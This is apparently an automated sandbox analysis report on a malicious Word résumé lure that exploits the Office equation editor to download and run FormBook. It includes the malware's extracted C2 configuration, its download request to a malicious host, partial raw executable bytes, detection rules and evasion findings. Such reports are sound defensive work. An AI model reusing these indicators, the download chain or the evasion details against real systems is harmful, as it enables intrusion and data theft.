Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report C.V_Job Request.doc

Overview

General Information

Sample Name:C.V_Job Request.doc
Analysis ID:510259
MD5:b5be29921304476377e096c60a3fb418
SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 940 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • seasonhd72463.exe (PID: 1812 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
      • seasonhd72463.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2176 cmdline: /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.seasonhd72463.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.seasonhd72463.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.seasonhd72463.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        5.0.seasonhd72463.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.seasonhd72463.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\seasonhd72463.exe, NewProcessName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, OriginalFileName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ProcessId: 1812

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: C.V_Job Request.docVirustotal: Detection: 50%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://binatonezx.tk/seasonzx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: binatonezx.tkVirustotal: Detection: 15%Perma Link
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeReversingLabs: Detection: 22%
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeReversingLabs: Detection: 22%
          Source: 5.0.seasonhd72463.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.seasonhd72463.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.seasonhd72463.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.seasonhd72463.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
          Source: global trafficDNS query: name: binatonezx.tk
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then jmp 005D1E35h4_2_005D1C8E
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then pop esi5_2_00417326
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then pop edi5_2_00417DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi7_2_00127326
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_00127DA8
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.agentpathleurre.space/s18y/
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: Joe Sandbox ViewIP Address: 2.56.59.211 2.56.59.211
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 14:42:17 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Wed, 27 Oct 2021 07:19:00 GMTETag: "80800-5cf50687391d8"Accept-Ranges: bytesContent-Length: 526336Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00
          Source: global trafficHTTP traffic detected: GET /seasonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.c
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.425477290.000000000031D000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT2P&
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp_2P&
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
